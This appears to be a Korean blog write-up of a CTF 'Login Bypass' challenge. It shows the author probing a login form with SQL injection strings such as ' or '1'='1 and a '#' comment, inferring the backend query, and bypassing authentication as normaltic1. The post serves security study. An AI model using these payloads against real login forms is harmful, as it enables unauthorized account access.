이번 문제는 normaltic1로 로그인을 성공하면 되는 문제이다.
1. 알고 있는 계정(doldol)으로 입력하여 로그인 후 Burp Suite을 확인
특이사항이 없는 것을 알 수 있다.
2. 로그아웃 후 해당 값들을 시도해본다.
- UserId: doldol' and '1'='1 / Password: ‘아무 글자’ -> 로그인 실패
- UserId: doldol' and '1'='1 / Password: ‘ doldol의 비밀번호’ -> 로그인 성공
- SQL 인젝션이 가능하다.
- UserId: doldol' or '1'='1 / Password: ‘아무 글자’ → 로그인 성공
- UserId: test' and '1'='1 / Password: ‘doldol의 비밀번호’ → 로그인 실패
- UserId: test' or '1'='1 / Password: ‘doldol의 비밀번호’ → doldol의 로그인 성공
- 식별과 인증을 동시에 하고 있다는 걸 알 수 있다.
- UserId: doldol' # / Password: ‘아무 글자’ → 로그인 실패
- UserId: doldol' # / Password: ‘doldol의 비밀번호’ → 로그인 성공
- 중간에 개행이 있을 것으로 예상된다.
위의 내용을 참고해봤을 때
SELECT * FROM 테이블명 WHERE userId = {UserId}
AND password = {Password};SQL 구문은 해당 구조로 예상이된다.
3. SQL 인젝션 실행
SQL 인젝션이 가능하므로 로그아웃 후
UserId: normaltic1' or '1'='1
로 입력 후 로그인 시 플래그를 확인할 수 있다.
728x90
반응형
'모의해킹 > 모의해킹 스터디' 카테고리의 다른 글
| 모의해킹 스터디 CTF 문제 - Login Bypass 3 (0) | 2024.11.23 |
|---|---|
| 모의해킹 스터디 CTF 문제 - Login Bypass 2 (0) | 2024.11.22 |
| 모의해킹 스터디 6주차 정리 (0) | 2024.11.21 |
| 모의해킹 스터디 CTF 문제 - Pin Code Crack (1) | 2024.11.20 |
| 모의해킹 스터디 CTF 문제 - Admin is Mine (0) | 2024.11.19 |